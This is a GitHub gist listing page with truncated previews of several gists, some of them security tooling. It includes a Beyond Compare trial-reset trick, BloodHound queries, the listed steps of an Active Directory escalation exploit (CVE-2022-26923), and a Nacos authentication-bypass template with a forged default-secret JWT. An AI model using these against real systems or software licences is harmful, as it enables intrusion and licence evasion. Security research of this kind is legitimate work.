Skip to content

Instantly share code, notes, and snippets.

View Esonhugh's full-sized avatar
💭
I may be slow to respond.

Esonhugh Skyworship Esonhugh

💭
I may be slow to respond.
451 followers · 400 following
View GitHub Profile
@codexss
codexss / doc.md
Created January 16, 2018 16:03
各种解码网站
@rise-worlds
rise-worlds / For Mac 4.2.6 unlimited trial.md
Last active June 26, 2024 12:22 — forked from satish-setty/trial.md
Beyond Compare 4 license for Windows, Mac, Linux

for 4.2.4 or higher, 4.2.5,4.2.6,4.3.7, it's works, this is the way which makes Always in evaluation mode.

  1. open Terminal, go to the dir : cd /Applications/Beyond Compare.app/Contents/MacOS
  2. change the name BCompare to BCompare.bak: mv BCompare BCompare.bak
  3. touch a file name BCompare , and chmod a+ux BCompare : touch BCompare && chmod a+ux BCompare
  4. open BCompare with text editor, insert the script :
#!/bin/bash
rm "/Users/$(whoami)/Library/Application Support/Beyond Compare/registry.dat"
"`dirname "$0"`"/BCompare.bak $@
@seajaysec
seajaysec / customqueries.json
Last active June 19, 2024 11:21
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
@bergeron
bergeron / k8s.io.api.admission.v1.swagger.json
Created September 30, 2020 22:18
Swagger 2.0 spec for k8s.io/api/admission/v1
{
"swagger": "2.0",
"info": {
"title": "k8s.io/api/admission/v1",
"version": "1.0"
},
"paths": {},
"definitions": {
"runtime.RawExtension": {
"description": "RawExtension is used to hold extensions in external versions.\n\nTo use this, make a field which has RawExtension as its type in your external, versioned struct, and Object in your internal struct. You also need to register your various plugin types.\n\n// Internal package: type MyAPIObject struct {\n\truntime.TypeMeta `json:\",inline\"`\n\tMyPlugin runtime.Object `json:\"myPlugin\"`\n} type PluginA struct {\n\tAOption string `json:\"aOption\"`\n}\n\n// External package: type MyAPIObject struct {\n\truntime.TypeMeta `json:\",inline\"`\n\tMyPlugin runtime.RawExtension `json:\"myPlugin\"`\n} type PluginA struct {\n\tAOption string `json:\"aOption\"`\n}\n\n// On the wire, the JSON will look something like this: {\n\t\"kind\":\"MyAPIObject\",\n\t\"apiVersion\":\"v1\",\n\t\"myPlugin\": {\n\t\t\"kind\":\"PluginA\",\n\t\t\"aOption\":\"foo
@myl7
myl7 / req.sh
Last active February 14, 2022 06:51
Zero-dependency HTTP request script from https://www.v2ex.com/t/811424
#!/bin/bash
set -euo pipefail
# From https://www.v2ex.com/t/811424
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
@Esonhugh
Esonhugh / proxy_shell.sh
Last active July 10, 2022 15:55
proxy setting for your shell
# Date: 2022-07-10
# Author: Esonhugh
# proxy command to make you switch your commandline fastly
export clash="127.0.0.1" # define as your favour
export portOfClash="7890" # define as your favour
proxys(){
case "$1" in
(h)
echo "|==============================================|"
@Esonhugh
Esonhugh / shodan-favicon-figerprint.py
Last active December 7, 2021 15:49 — forked from yehgdotnet/get-shodan-favicon-hash.py
Get Shodan FAVICON Hash (Eson modified)
# https://twitter.com/brsn76945860/status/1171233054951501824
# pip install mmh3
#
# in python 3
# Author: https://gist.github.com/yehgdotnet
#
# Author: Esonhugh (https://gist.github.com/Esonhugh) more automatic
# date: 2021/12/07 23:38 UTC+0800
import mmh3
@CwithW
CwithW / main.md
Last active March 27, 2024 07:34
Subconverter v0.7.2 unauthorized RCE

Subconverter v0.7.2 unauthorized RCE

Software Link(Subconverter): https://github.com/tindy2013/subconverter

Affected versions: Subconverter v0.7.2, < v0.7.2-ce8d2bd

Description

A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows unauthorized attackers to execute arbitrary code via crafted config and url parameters.

@dmchell
dmchell / Program.cs
Created May 12, 2022 10:41
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
@Esonhugh
Esonhugh / nacos_bypass_nuclei_template.yaml
Last active December 18, 2023 06:50
nacos default jwt secret encryption vuln nuclei poc leaking all passwords and create user automatically exploit.
id: nacos-bypass-authentication
variables:
#token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.vqhkMLKmquQ6R5AD6VWrTOqgClC599nnAQgQLHhPcLc
# token is signed with a very long time expire.
# token exp -1
token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6LTF9.ybUomrBRXZhbUMWVgXRz3Q6zndbF-Zdk4RGpCnV-Ofs
info:
name: Nacos Bypass Auth with default jwt secret